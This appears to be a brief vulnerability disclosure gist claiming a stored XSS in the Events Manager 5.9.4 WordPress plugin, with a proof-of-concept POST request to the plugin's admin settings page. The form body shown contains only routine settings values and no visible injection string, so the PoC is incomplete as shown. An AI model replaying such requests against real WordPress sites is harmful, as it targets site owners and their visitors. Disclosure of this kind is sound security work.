Stored XSS in Event Manager 5.9.4

gistfile1.txt

Product: Events Manager 5.9.4 plugin for wordpress
POC:
POST /wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options HTTP/1.1 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://xxxxxx/wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 736 
Cookie: wp-saving-post=41-saved; wordpress_xxxxx
Connection: close 
Upgrade-Insecure-Requests: 1 
 
-----
import_settings_file=&dbem_cp_events_slug=events&dbem_cp_locations_slug=locations&dbem_taxonomy_category_slug=events%2Fcategories&dbem_taxonomy_tag_slug=events&Submit=Save+Changes+%28All%29&dbem_event_reapproved_email_body=Dear+%23_CONTACTNAME%2C+%0D%0A%0D%0AYour+event+%23_EVENTNAME+on+%23_EVENTDATES+has+been+approved.%0D%0A%0D%0AYou+can+view+your+event+here%3A+%23_EVENTURL%0D%0A%0D%0A%0D%0A-------------------------------%0D%0A%0D%0APowered+by+Events+Manager+-+http%3A%2F%2Fwp-events-plugin.com&em-submitted=1&_wpnonce=73cfc75e10&tab_path=pages%2Bpermalinks
-----